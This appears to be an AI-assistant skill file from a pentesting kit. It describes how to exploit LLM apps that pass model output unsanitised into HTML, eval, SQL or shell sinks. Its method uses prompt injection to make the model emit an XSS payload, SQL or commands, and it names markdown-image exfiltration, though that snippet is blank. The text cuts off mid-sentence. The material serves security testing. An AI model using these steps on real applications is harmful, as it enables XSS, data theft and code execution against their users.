ai-insecure-output-handlinglisted
Install: claude install-skill NoorQureshi/ronin
# Insecure output handling (LLM → sink)
## When it applies
The app treats LLM output as trusted and passes it into a dangerous sink — rendered as HTML,
executed as code/SQL/shell, or forwarded to another API. The model becomes an injection vector,
especially when its input is attacker-influenced (→ chain with `ai-prompt-injection`).
## Why it works
Developers trust their own model's output, but it's just text — and an attacker can steer it via
prompt injection. If that text lands in `innerHTML`, `eval`, a SQL string, a shell command, or a
system call without sanitization, you get XSS/RCE/SQLi *through* the LLM.
## Method
1. **Find the sink**: where does model output go? HTML render (`innerHTML`, markdown→HTML,
`dangerouslySetInnerHTML`), code exec (`eval`, code interpreter), DB (LLM-built query), shell,
or another service call.
2. **Get the model to emit a payload**: via direct or indirect prompt injection, make the output
contain `<img src=x onerror=alert(document.domain)>`, a `javascript:` link, SQL, or a command.
3. **Route to impact**:
- Rendered output → **stored/reflected XSS** (fires for the user or others viewing the chat).
- Code-interpreter/tool → **RCE** (→ `ai-agent-tool-abuse`).
- LLM-generated SQL/commands executed → **SQLi / command injection**.
4. **Markdown exfil**: model emits `` → beacons data on render.
## Gotchas
- The bug is in the *app's* handling, not the model — the fix is output encoding/sandboxin